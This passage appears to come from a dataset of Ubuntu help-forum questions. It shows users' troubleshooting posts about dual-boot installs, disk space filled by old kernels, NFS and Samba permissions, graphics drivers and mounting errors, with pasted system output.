63 sectors/track , 3892 cylinders , total 62533296 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0002220c device boot start end blocks id system /dev/sda1 2048 58593279 29295616 83 linux /dev/sda2 58595326 62531583 1968129 5 extended /dev/sda5 58595328 62531583 1968128 82 linux swap / solaris warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xae4a2926 device boot start end blocks id system /dev/sdb1 1 1953525167 976762583+ ee gpt partition 1 does not start on physical sector boundary . disk /dev/sdc : 15.7 gb , 15724707840 bytes 255 heads , 63 sectors/track , 1911 cylinders , total 30712320 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 * 2048 30711807 15354880 c w95 fat32 ( lba ) disk /dev/sdd : 4007 mb , 4007657472 bytes 16 heads , 32 sectors/track , 15288 cylinders , total 7827456 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00078e15 device boot start end blocks id system /dev/sdd1 * 8064 7827455 3909696 b w95 fat32 additionally , here is the windows bootloader info : windows boot manager -- -- -- -- -- -- -- -- -- -- identifier { 9dea862c-5cdd-4e70-acc1-f32b344d4795 } device partition=\device\harddiskvolume4 path \efi\microsoft\boot\bootmgfw.efi description windows boot manager locale en-us inherit { 7ea2e1ac-2e61-4728-aaa3-896d9d0a9f0e } integrityservices enable default { ebc776f2-eb72-11e2-a6d5-8de6316016ce } resumeobject { ebc776f1-eb72-11e2-a6d5-8de6316016ce } displayorder { ebc776f2-eb72-11e2-a6d5-8de6316016ce } toolsdisplayorder { b2721d73-1db4-4c62-bf78-c548a880142d } timeout 30 windows boot loader -- -- -- -- -- -- -- -- -- - identifier { ebc776f2-eb72-11e2-a6d5-8de6316016ce } device partition=c : path \windows\system32\winload.efi description windows 8.1 locale en-us inherit { 6efb52bf-1766-41db-a6b3-0ee5eff72bd7 } recoverysequence { ebc776f3-eb72-11e2-a6d5-8de6316016ce } integrityservices enable recoveryenabled yes isolatedcontext yes allowedinmemorysettings 0x15000075 osdevice partition=c : systemroot \windows resumeobject { ebc776f1-eb72-11e2-a6d5-8de6316016ce } nx optin bootmenupolicy standard i can also post the results of bootscriptinfo if that will help . any help would be much appreciated - i 've found several solutions on these boards , but i 'm not quite sure if they are applicable to this situation , and i do n't want to try them for fear of screwing up my windows install - it 's the only thing working at the moment ! thanks , -rob
432354	how do i use nat in iptables	i have a domain set for my server , let 's say example.com which is being forwarded by my router and is linked to my external ip 11.111.111.111 and it works fine if i ping the domain , or i do a lookup , it recognizes it and gives me the external ip of the domain . but when i listen in on any of the ports i have set to allow , it says they are closed . what rule should i set for this to forward correctly through to my router ? eth0 is my static internal interface and lo it my loop back . gateway : 192.168.0.1 ifconfig : eth0 link encap : ethernet hwaddr 00:0e:7f : a9:10:54 inet addr:192.168.0.8 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :20e:7fff : fea9:1054/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:8175 errors:0 dropped:0 overruns:0 frame:0 tx packets:5730 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:6186702 ( 6.1 mb ) tx bytes:1444662 ( 1.4 mb ) interrupt:20 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b )
432355	usb ubuntu when reboot or shutdown and then boot again files are removed	i added ubuntu 32bit on my 4gigabyte u.s.b and its running fine ! but the problem is that i created 2 files in the desktop and when i reboot the files where vanished and i realized that its not saving files is it possible to make it save the files ? i tried to install it on a hard drive but it asked me to partition my disks and i do n't want to format any of my partitions so thats it ...
432357	installing ubuntu 13.10	i download ubuntu 13.10 via bootable usb and it worked fine . i encountered a problem after i reboot my laptop . i press f12 and choose usb device . then the `` welcome '' window opened and i follow the instruction but when igot to `` installation type '' i did n't have the `` install along side.. '' option . i do n't want to erase my original os . i have windows 8 on my dell computer . what am i doing wrong ?
432359	clustered web server	how to build a redundant webserver cluster based on the following requirements ? two ubuntu server 12.04 lts active-active nodes ( really load-balanced ; not round robin ) . apache web server site content on a shared storage ( or mirrored and synced on both servers ) detailed steps would be highly appreciated .
432360	`` invalid video format '' after installing ubuntu	i am having this problem every time i install ubuntu on my pc . i used to connect my pc via a vga cable to my screen and every time i install ubuntu on any pc that uses a vga cable , i will get an error message saying unsupported video file , invalid video format it also says can not display this video mode . one time , i installed a dvi-d video cable and it worked fine . i just want to know why do n't vga cables work when installing ubuntu ?
432363	how do i repair a disk ( is not booting )	my hard drive will not boot . the screen comes up blank . it was working fine yesterday . no changes made . i am using ubuntu 13.10 on 64-bit . on the same computer , i am using an usb emergency installation to do this work . it booted just fine , all computer hardware also tested ok ; hence , the problem is the ubuntu installation . this computer is ubuntu dedicated ( no dual boot . )
432365	empathy error inside vm	i am getting : failed to retreive your personal information from the server while trying to enable empathy people nearby inside vmware workstation this situation is working fine from my desktop
432368	how do i use wget to download youtube videos ?	i have ubuntu 12.04 lts and i just found out about the wget command and was wondering if there was a way to download youtube videos using wget ?
432369	how to fix upgrade , install failure loop due to disk space issue	i 'm running into an upgrade / install failure loop due to disk space , but i do n't see which drive is full . i 've tried clean , autoclean and autoremove , but to no avail . this is ubuntu on aws . there are a bunch of kernels in my /boot directory ( listed at bottom ) , but i do n't know how to clean this up , since clean , autoclean , autoremove did n't work . i 've listed the upgrade , install and df command outputs below : sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-headers-virtual : depends : linux-headers-3.2.0-59-virtual but it is not installed linux-virtual : depends : linux-image-virtual ( = 3.2.0.59.70 ) but 3.2.0.60.71 is installed e : unmet dependencies . try using -f. sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-headers-3.2.0-52-virtual libgudev-1.0-0 linux-image-3.2.0-45-virtual linux-headers-3.2.0-55-virtual linux-headers-3.2.0-40 linux-headers-3.2.0-41 linux-headers-3.2.0-36 linux-headers-3.2.0-37 linux-headers-3.2.0-43 linux-headers-3.2.0-38 linux-headers-3.2.0-44 linux-headers-3.2.0-39 linux-headers-3.2.0-45 linux-headers-3.2.0-51 linux-headers-3.2.0-52 linux-headers-3.2.0-53 linux-headers-3.2.0-48 linux-headers-3.2.0-54 linux-headers-3.2.0-55 linux-headers-3.2.0-56 linux-headers-3.2.0-57 linux-headers-3.2.0-37-virtual linux-image-3.2.0-53-virtual linux-image-3.2.0-48-virtual linux-image-3.2.0-40-virtual linux-headers-3.2.0-45-virtual linux-image-3.2.0-56-virtual linux-image-3.2.0-43-virtual linux-headers-3.2.0-53-virtual linux-headers-3.2.0-48-virtual linux-headers-3.2.0-40-virtual linux-image-3.2.0-51-virtual linux-headers-3.2.0-56-virtual linux-headers-3.2.0-43-virtual linux-headers-3.2.0-38-virtual linux-image-3.2.0-54-virtual linux-image-3.2.0-41-virtual linux-headers-3.2.0-51-virtual linux-image-3.2.0-57-virtual gir1.2-gudev-1.0 linux-image-3.2.0-44-virtual linux-image-3.2.0-39-virtual linux-headers-3.2.0-54-virtual linux-headers-3.2.0-41-virtual linux-headers-3.2.0-36-virtual linux-image-3.2.0-52-virtual linux-headers-3.2.0-57-virtual linux-headers-3.2.0-44-virtual linux-headers-3.2.0-39-virtual linux-image-3.2.0-55-virtual use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-headers-3.2.0-60 linux-headers-3.2.0-60-virtual linux-headers-virtual linux-virtual the following new packages will be installed : linux-headers-3.2.0-60 linux-headers-3.2.0-60-virtual the following packages will be upgraded : linux-headers-virtual linux-virtual 2 upgraded , 2 newly installed , 0 to remove and 41 not upgraded . 3 not fully installed or removed . need to get 0 b/12.7 mb of archives . after this operation , 67.7 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 463845 files and directories currently installed . ) unpacking linux-headers-3.2.0-60 ( from ... /linux-headers-3.2.0-60_3.2.0-60.91_all.deb ) ... dpkg : error processing /var/cache/apt/archives/linux-headers-3.2.0-60_3.2.0-60.91_all.deb ( -- unpack ) : error creating directory `./usr/src/linux-headers-3.2.0-60/arch/cris/arch-v32/drivers/mach-a3 ' : no space left on device no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) unpacking linux-headers-3.2.0-60-virtual ( from ... /linux-headers-3.2.0-60-virtual_3.2.0-60.91_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/linux-headers-3.2.0-60-virtual_3.2.0-60.91_amd64.deb ( -- unpack ) : unable to create `/usr/src/linux-headers-3.2.0-60-virtual/include/config/regulator/max8952.h.dpkg-new ' ( while processing `./usr/src/linux-headers-3.2.0-60-virtual/include/config/regulator/max8952.h ' ) : no space left on device no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/linux-headers-3.2.0-60_3.2.0-60.91_all.deb /var/cache/apt/archives/linux-headers-3.2.0-60-virtual_3.2.0-60.91_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) filesystem size used avail use % mounted on /dev/xvda1 7.9g 6.0g 1.6g 80 % / udev 819m 12k 819m 1 % /dev tmpfs 331m 200k 331m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 827m 0 827m 0 % /run/shm /dev/xvdb 147g 188m 140g 1 % /mnt there are a bunch of kernels in my /boot directory but i do n't know how to clean this up : ls -alst /boot total 273760 12 drwxr-xr-x 3 root root 12288 mar 10 17:58 grub 4 drwxr-xr-x 3 root root 4096 mar 10 17:56 . 4504 -rw-r -- r -- 1 root root 4608695 mar 10 17:56 initrd.img-3.2.0-60-virtual 4 drwxr-xr-x 25 root root 4096 mar 10 17:56 .. 4504 -rw-r -- r -- 1 root root 4608640 mar 10 17:54 initrd.img-3.2.0-59-virtual 780 -rw-r -- r -- 1 root root 795696 feb 19 04:51 abi-3.2.0-60-virtual 140 -rw-r -- r -- 1 root root 140627 feb 19 04:51 config-3.2.0-60-virtual 2828 -rw -- -- -- - 1 root root 2893967 feb 19 04:51 system.map-3.2.0-60-virtual 4856 -rw -- -- -- - 1 root root 4969360 feb 19 04:51 vmlinuz-3.2.0-60-virtual 4504 -rw-r -- r -- 1 root root 4608261 jan 15 19:49 initrd.img-3.2.0-58-virtual 780 -rw-r -- r -- 1 root root 795704 jan 7 23:40 abi-3.2.0-59-virtual 140 -rw-r -- r -- 1 root root 140644 jan 7 23:40 config-3.2.0-59-virtual 2828 -rw -- -- -- - 1 root root 2894157 jan 7 23:40 system.map-3.2.0-59-virtual 4856 -rw -- -- -- - 1 root root 4970192 jan 7 23:40 vmlinuz-3.2.0-59-virtual 4504 -rw-r -- r -- 1 root root 4608753 dec 9 23:12 initrd.img-3.2.0-57-virtual 780 -rw-r -- r -- 1 root root 795704 dec 3 18:37 abi-3.2.0-58-virtual 140 -rw-r -- r -- 1 root root 140644 dec 3 18:37 config-3.2.0-58-virtual 2828 -rw -- -- -- - 1 root root 2894046 dec 3 18:37 system.map-3.2.0-58-virtual 4852 -rw -- -- -- - 1 root root 4968208 dec 3 18:37 vmlinuz-3.2.0-58-virtual 780 -rw-r -- r -- 1 root root 795704 nov 12 22:31 abi-3.2.0-57-virtual 140 -rw-r -- r -- 1 root root 140644 nov 12 22:31 config-3.2.0-57-virtual 2828 -rw -- -- -- - 1 root root 2893904 nov 12 22:31 system.map-3.2.0-57-virtual 4852 -rw -- -- -- - 1 root root 4967472 nov 12 22:31 vmlinuz-3.2.0-57-virtual 4500 -rw-r -- r -- 1 root root 4607041 nov 9 06:42 initrd.img-3.2.0-56-virtual 780 -rw-r -- r -- 1 root root 795639 oct 23 10:30 abi-3.2.0-56-virtual 140 -rw-r -- r -- 1 root root 140644 oct 23 10:30 config-3.2.0-56-virtual 2828 -rw -- -- -- - 1 root root 2893791 oct 23 10:30 system.map-3.2.0-56-virtual 4852 -rw -- -- -- - 1 root root 4966992 oct 23 10:30 vmlinuz-3.2.0-56-virtual 4500 -rw-r -- r -- 1 root root 4607180 oct 22 06:42 initrd.img-3.2.0-55-virtual 4500 -rw-r -- r -- 1 root root 4606152 oct 21 06:05 initrd.img-3.2.0-54-virtual 780 -rw-r -- r -- 1 root root 795639 oct 2 13:29 abi-3.2.0-55-virtual 140 -rw-r -- r -- 1 root root 140644 oct 2 13:29 config-3.2.0-55-virtual 2828 -rw -- -- -- - 1 root root 2893791 oct 2 13:29 system.map-3.2.0-55-virtual 4852 -rw -- -- -- - 1 root root 4967440 oct 2 13:29 vmlinuz-3.2.0-55-virtual 780 -rw-r -- r -- 1 root root 795492 sep 10 21:17 abi-3.2.0-54-virtual 140 -rw-r -- r -- 1 root root 140644 sep 10 21:17 config-3.2.0-54-virtual 2828 -rw -- -- -- - 1 root root 2893300 sep 10 21:17 system.map-3.2.0-54-virtual 4852 -rw -- -- -- - 1 root root 4966256 sep 10 21:17 vmlinuz-3.2.0-54-virtual 4500 -rw-r -- r -- 1 root root 4605968 sep 7 2013 initrd.img-3.2.0-53-virtual 780 -rw-r -- r -- 1 root root 795492 aug 22 2013 abi-3.2.0-53-virtual 140 -rw-r -- r -- 1 root root 140644 aug 22 2013 config-3.2.0-53-virtual 2828 -rw -- -- -- - 1 root root 2893126 aug 22 2013 system.map-3.2.0-53-virtual 4852 -rw -- -- -- - 1 root root 4966064 aug 22 2013 vmlinuz-3.2.0-53-virtual 4400 -rw-r -- r -- 1 root root 4502983 aug 20 2013 initrd.img-3.2.0-52-virtual 4400 -rw-r -- r -- 1 root root 4503043 aug 8 2013 initrd.img-3.2.0-51-virtual 780 -rw-r -- r -- 1 root root 795318 jul 26 2013 abi-3.2.0-52-virtual 140 -rw-r -- r -- 1 root root 140644 jul 26 2013 config-3.2.0-52-virtual 2828 -rw -- -- -- - 1 root root 2892320 jul 26 2013 system.map-3.2.0-52-virtual 4852 -rw -- -- -- - 1 root root 4964752 jul 26 2013 vmlinuz-3.2.0-52-virtual 780 -rw-r -- r -- 1 root root 795318 jul 24 2013 abi-3.2.0-51-virtual 140 -rw-r -- r -- 1 root root 140644 jul 24 2013 config-3.2.0-51-virtual 2828 -rw -- -- -- - 1 root root 2892320 jul 24 2013 system.map-3.2.0-51-virtual 4848 -rw -- -- -- - 1 root root 4964240 jul 24 2013 vmlinuz-3.2.0-51-virtual 4400 -rw-r -- r -- 1 root root 4502820 jul 11 2013 initrd.img-3.2.0-48-virtual 780 -rw-r -- r -- 1 root root 795318 jun 6 2013 abi-3.2.0-48-virtual 140 -rw-r -- r -- 1 root root 140637 jun 6 2013 config-3.2.0-48-virtual 2828 -rw -- -- -- - 1 root root 2892052 jun 6 2013 system.map-3.2.0-48-virtual 4848 -rw -- -- -- - 1 root root 4963440 jun 6 2013 vmlinuz-3.2.0-48-virtual 4400 -rw-r -- r -- 1 root root 4501891 may 31 2013 initrd.img-3.2.0-45-virtual 780 -rw-r -- r -- 1 root root 795099 may 29 2013 abi-3.2.0-45-virtual 140 -rw-r -- r -- 1 root root 140637 may 29 2013 config-3.2.0-45-virtual 2824 -rw -- -- -- - 1 root root 2890696 may 29 2013 system.map-3.2.0-45-virtual 4848 -rw -- -- -- - 1 root root 4962320 may 29 2013 vmlinuz-3.2.0-45-virtual 4400 -rw-r -- r -- 1 root root 4502465 may 25 2013 initrd.img-3.2.0-44-virtual 780 -rw-r -- r -- 1 root root 795099 may 16 2013 abi-3.2.0-44-virtual 140 -rw-r -- r -- 1 root root 140637 may 16 2013 config-3.2.0-44-virtual 2824 -rw -- -- -- - 1 root root 2890696 may 16 2013 system.map-3.2.0-44-virtual 4848 -rw -- -- -- - 1 root root 4962032 may 16 2013 vmlinuz-3.2.0-44-virtual 4400 -rw-r -- r -- 1 root root 4502610 may 16 2013 initrd.img-3.2.0-43-virtual 780 -rw-r -- r -- 1 root root 794949 may 15 2013 abi-3.2.0-43-virtual 140 -rw-r -- r -- 1 root root 140637 may 15 2013 config-3.2.0-43-virtual 2824 -rw -- -- -- - 1 root root 2890123 may 15 2013 system.map-3.2.0-43-virtual 4848 -rw -- -- -- - 1 root root 4961104 may 15 2013 vmlinuz-3.2.0-43-virtual 4400 -rw-r -- r -- 1 root root 4502840 may 4 2013 initrd.img-3.2.0-41-virtual 2824 -rw -- -- -- - 1 root root 2890123 apr 25 2013 system.map-3.2.0-41-virtual 780 -rw-r -- r -- 1 root root 794949 apr 25 2013 abi-3.2.0-41-virtual 140 -rw-r -- r -- 1 root root 140637 apr 25 2013 config-3.2.0-41-virtual 4848 -rw -- -- -- - 1 root root 4961584 apr 25 2013 vmlinuz-3.2.0-41-virtual 4400 -rw-r -- r -- 1 root root 4503343 apr 10 2013 initrd.img-3.2.0-40-virtual 4360 -rw-r -- r -- 1 root root 4461457 mar 28 2013 initrd.img-3.2.0-39-virtual 780 -rw-r -- r -- 1 root root 794886 mar 25 2013 abi-3.2.0-40-virtual 140 -rw-r -- r -- 1 root root 140601 mar 25 2013 config-3.2.0-40-virtual 2824 -rw -- -- -- - 1 root root 2889468 mar 25 2013 system.map-3.2.0-40-virtual 4844 -rw -- -- -- - 1 root root 4959408 mar 25 2013 vmlinuz-3.2.0-40-virtual 4356 -rw-r -- r -- 1 root root 4460205 mar 1 2013 initrd.img-3.2.0-38-virtual 776 -rw-r -- r -- 1 root root 792783 feb 28 2013 abi-3.2.0-39-virtual 140 -rw-r -- r -- 1 root root 140503 feb 28 2013 config-3.2.0-39-virtual 2820 -rw -- -- -- - 1 root root 2887126 feb 28 2013 system.map-3.2.0-39-virtual 4844 -rw -- -- -- - 1 root root 4956208 feb 28 2013 vmlinuz-3.2.0-39-virtual 776 -rw-r -- r -- 1 root root 792783 feb 19 2013 abi-3.2.0-38-virtual 140 -rw-r -- r -- 1 root root 140503 feb 19 2013 config-3.2.0-38-virtual 2820 -rw -- -- -- - 1 root root 2886098 feb 19 2013 system.map-3.2.0-38-virtual 4840 -rw -- -- -- - 1 root root 4954288 feb 19 2013 vmlinuz-3.2.0-38-virtual 4356 -rw-r -- r -- 1 root root 4460212 feb 18 2013 initrd.img-3.2.0-37-virtual 4356 -rw-r -- r -- 1 root root 4460424 feb 18 2013 initrd.img-3.2.0-36-virtual 776 -rw-r -- r -- 1 root root 792720 jan 24 2013 abi-3.2.0-37-virtual 140 -rw-r -- r -- 1 root root 140520 jan 24 2013 config-3.2.0-37-virtual 2820 -rw -- -- -- - 1 root root 2884868 jan 24 2013 system.map-3.2.0-37-virtual 4840 -rw -- -- -- - 1 root root 4955792 jan 24 2013 vmlinuz-3.2.0-37-virtual 776 -rw-r -- r -- 1 root root 792720 jan 8 2013 abi-3.2.0-36-virtual 140 -rw-r -- r -- 1 root root 140520 jan 8 2013 config-3.2.0-36-virtual 2820 -rw -- -- -- - 1 root root 2885084 jan 8 2013 system.map-3.2.0-36-virtual 4840 -rw -- -- -- - 1 root root 4955248 jan 8 2013 vmlinuz-3.2.0-36-virtual 4304 -rw-r -- r -- 1 root root 4405492 dec 23 2012 initrd.img-3.2.0-25-virtual 2820 -rw -- -- -- - 1 root root 2885491 may 24 2012 system.map-3.2.0-25-virtual 776 -rw-r -- r -- 1 root root 791085 may 24 2012 abi-3.2.0-25-virtual 140 -rw-r -- r -- 1 root root 140422 may 24 2012 config-3.2.0-25-virtual 4840 -rw -- -- -- - 1 root root 4955600 may 24 2012 vmlinuz-3.2.0-25-virtual 176 -rw-r -- r -- 1 root root 176764 nov 27 2011 memtest86+.bin 176 -rw-r -- r -- 1 root root 178944 nov 27 2011 memtest86+_multiboot.bin
432373	mouting patition problem	i am using ubuntu 13.10. when i mounting partition of hdd . shows this error any solution ? error mounting /dev/sda3 at /media/asheesh/all : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda3 '' `` /media/asheesh/all '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda3 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option .
432377	filenotfounderror ota update 188 - > 226	updating ubuntu touch from r188 to r226 in the system settings gives me the error after full download : filenotfounderror /var/ ... /blacklist ... what is the easiest way to fix this error ?
432378	certain websites do not load in 12.04	certain websites do not load on my 12.04 64 bit system.this is not browser specific issue , as websites that do not load with firefox also do not load with chromium . for instance www.hgst.com does not load and all i get is a message of waiting at the bottom left side of browser in firefox . i accessed this website easily on my phone . same for twitter and many other sites that i have not kept count of . i had faced this problem before i upgraded from 32 bit to 64 bit , then i could not even access ask ubuntu . thankfully now i am able to access ask ubuntu . already tried sudo dpkg-reconfigure resolvconf . it did not work . have gone through posts on similar problems on this forum and did not find a solution that would work for me . please suggest any solutions ?
432382	where do files in shared folders go when deleted ?	i have a shared folder between ubuntu users , this shared files contains files for my company work , if a user delete a file ( normal delete not shift+delete ) . where does this file go , what solution should i have ?
432385	12.04 nvidia graphics resolution problem	i am trying to use opengl on my laptop , a dell inspiron n5110 with nvidia geforce gt 525m . i managed to install my graphics card by using the following commands : sudo apt-add-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get upgrade sudo apt-get install nvidia-current sudo apt-get install nvidia-settings sudo reboot but then i had some errors at my opengl program and since then i entered a lot of commands and managed to do something and now my resolution is fixed at 640x480 . these are the commands i entered to fix my opengl problem : sudo apt-get purge nvidia* sudo apt-get install -- reinstall xserver-xorg-video-intel libgl1-mesa-glx libgl1- mesa-dri xserver-xorg-core sudo dpkg-reconfigure xserver-xorg and after running these commands i noticed that even though my graphics card was properly installed , in system settings- > details it did not appear . so i read this nvidia graphics shown as unknown and entered the following commands and that 's when my resolution got stuck at 640x480 sudo apt-get install mesa-utils sudo reboot sudo nvidia-xconfig so i guess that what i am trying to ask is how can i revert my laptop to it 's previous state also here is the output of the lspci | grep vga command : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 525m ] ( rev a1 )
432387	can not install ubuntu 12.04 or 13.04 in dualboot with windows 8.1 , uefi	hardware : asus g53sx laptop , nvidia 560m , sda ssd ( windows on it ) , sdb hdd ( subpartition with desired ubuntu shrinked from it sdb5 ) i tried to install 12.04 . it works in legacy mode but after i install it i can not boot it . ( secureboot unsupported , fastboot off ) . when i try to run the installer in uefi , it freezes after the grub menu ( `` install ubuntu '' ) . i tried all the noalpic , nomodeset etc , nothing seemed to work . then i installed 13.10 worked flawless , but found out in the end that i have to install either 12.04 or 13.04 ( some packages that i need are only on those platforms ) . so i tried 13.04 with 13.04 , installer works fine in uefi , instalation goes flawless , but every time after , it loads just grub command line . so i run liveusb , run repairboot , and after grub loads . if i select ubuntu it will purple freeze . if i select `` safe-mode '' i get black screen ! if i select windows boot loader it boots windows just fine . repairboot file : http : //paste.ubuntu.com/7069272 i read already checked a lot of simmiliar questions but none helped me whatsoever . george
432389	( acx 111 ) driver problems on ubuntu server 12.04.4	this is basically what my wireless card looks to . *-network unclaimed description : network controller product : acx 111 54mbps wireless interface vendor : texas instruments physical id : 1 bus info : pci @ 0000:05:01.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=32 resources : memory : fbffe000-fbffffff memory : fbfc0000-fbfdffff i 've tried many methods to no avail . as listed '' ndiswrapper '' ( to use windows drivers ) does n't work for some reason . `` linksys '' driver '' modprobe '' to work with ndiswrapper . broken , reinstalled , still broken . what in gods earth am i doing wrong ? also : one of the error messages i 'm getting for the linksys driver ; -bash : lstinds.new : permission denied
432393	simple guide to making public_html work	i am pretty new to ubuntu , and i tried to make public_html work . so for every user i made it automatically gives the user a folder in there and can upload . and that you can just use ~username to the site in your browers . i followed a guide , but what i get is 500 oops : can not change directory : /home/test so is there any simple guide that can show me every single step ?
432398	problem after updating 12.04	i 'm from germany and i encountered a problem after updating ubuntu 12.04 . i did n't update for a longish period ( 5 weeks ) and apparently something happened during the downloading process ( approx . 120 mb ) . i tried different things i read about , but nothing helped or solved the problem . as i 'm not good at computers i ask for your help . the following error comes up when trying to update : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/extras.ubuntu.com_ubuntu_dists_precise_main_binary-i386_packages , e : die paketliste oder die statusdatei konnte nicht eingelesen oder geรถffnet werden . ' what should i do ? i tried the suggested solution and computer came up with the following : thomas @ thomas-satellite-p200 : ~ $ ubuntu-support-status traceback ( most recent call last ) : file `` /usr/bin/ubuntu-support-status '' , line 79 , in help=_ ( `` show unsupported packages on this machine '' ) .decode ( enc ) ) unicodedecodeerror : 'ascii ' codec ca n't decode byte 0xc3 in position 13 : ordinal not in range ( 128 ) any ideas ?
432399	grub-customizer not saving the changes after kernel upgrades	i 'm running into an annoying problem with grub-customizer ( 4.0.4 ) every time i update the kernel versions . after the kernel update i normally open grub-customizer to accommodate the new kernel ( renaming it , putting the older kernel in a sub-menu , and so on ) and then save the new settings . everything seems normal , until i reboot , just to see that nothing has changed in the real grub , the old boot order and settings are still there . it 's really annoying . so far my awkward workaround is re-installing the grub fresh from scratch using boot-repair cd , and things are good until the next kernel upgrade . i 've been searching for some time now , but ca n't seem to find anything helpful . can anyone shed some light on this issue/bug ? using xubuntu lts 12.04.4 , grub 2 , grub-customizer 4.0.4 , kernel 3.2.0-60 . pc setup : multi-boot a few mix oss , xubuntu , ubuntu , debian , win 7 . thanks .
432400	apache restart after updating php pages	i have to restart apache every time i update a php file . it 's not a client browser cache problem , i tried multiple browsers . the strange thing is i only need to do it with php files , html files updates fine..
432401	my ubunto 12.04 installation hangs after `` preparing to install ubuntu '' . what can i do to work around the problem ?	i did download ubuntu 12.04lts . i tried to install - no progress . i tried to remove all partition using a bootable version of gparted . i created one big partition ext4 formatted . it all did not help . the installation stops after `` preparing to install ubuntu '' . all three checkmarks are checked an i can click `` continue '' but then nothing for hours . what can i do ? please help !
432402	ca n't install ubuntu 13.10 along window 7	i have an amd athlon x2 2.4 gh processor , 2gb ram , msi mother board . i am trying to install ubuntu 13.10 along side win7 . will happily provide more info if needed . booting from ubuntu 13.10 bootable dvd ubuntu splash screen comes up gui/drivers seem to work fine ( wifi/mouuse/display/audio ) select language-english-install ubuntu preparing to install ubuntu green checks for at least 5.9gb free space , plugged in , connected to internet ( wifi ) i check box download updates while installing and install this 3rd party software installation type : install ubuntu inside windows 7 this is where it fails . the dvd ejects , black screen and the following message appears : acpid : exiting speech-dispatcher disabled ; edit /etc/default/speech-dispatcher *asking all remaining processes to terminate [ ok ] nothing happens after this so i strike the enter key and the machine reboots . please help ! many other like me have same question but no answer .
432403	problems with recompiling swish++	i 'm working with swish++ in ubuntu 12.04 . due to my thesis i must install swish++ from the source code . during the installation i faced with several problems , but finally i solved them and swish++ package was successfully installed . although i found a discrepancy with swish++ names ( i asked this question , but got no answers there ) . anyway , despite this , everything went ok . i could use index and search with all the functions of index++ and search++ . but now i have another problem . i changed config files of swish++ and need to recompile it . the first time i did it i used command make . how can i delete swish++ and install it again ? the command sudo apt-get remove -- auto-remove swish++ says that package has n't been istalled and ca n't be removed . how can i remove programms having been installed from the source code ?
432407	permission on shared folder are correct but files ca n't be saved	i have a shared folder set up on an ubuntu machine . when someone connects to the folder and creates a file , the file permissions set the group to read/write . i can check the permission on ubuntu or windows and they both show the group has read/write permission . the problem comes when a user tries to edit a file created by another user . for example , user1 creates a text document . if user2 connects to the shared folder they can open the text document but when they try to save the file there is an error saying they do n't have permission . each user is also a part of the same group . my samba.conf file addition looks like this : [ foldername ] page = /home/path/to/directory writeable = yes browseable = yes read only = no valid users = user1 , user2 , user3 , user4
432411	what will happen with ubuntu if i reinstall windows 8.1	the title pretty much sums up the question . i 'm using windows 8.1 and ubuntu 12.04 in dualboot and now something in windows 8.1 broke and by the looks of it i may have to refresh/reinstall it . since i had to go through hell installing ubuntu ( removing uefi boot , manually installing ubuntu then launching boot repair which created boot-grub for both ubuntu and windows ) i ca n't figure out what will happen if i let windows 8.1 refresh/reinstall itself ( windows 8.1 comes with a button for that and i may have to use it ) . there are numerous questions about installing ubuntu alongside windows 8.1 but how to safely remove one or the other without having to throw your hdd ?
432416	how to allow writing locally on read-only nfs partition	i created my own pxe/nfs network boot server on ubuntu 12.04 as explained here . i can write to files on client side if i change /etc/exports file like this on server side : /srv/ubuntulivecd/ * ( rw , async , no_root_squash , no_subtree_check ) i want to change files only locally . i mean this should n't change the file on nfs partition if i write to the file on local . if i change rw ( read-write ) option to ro ( read-only ) , i ca n't change files ( as expected ) because of permissions . is there a way to change files locally or temporary ( all files have to be removed after reboot or power off ) on client side ?
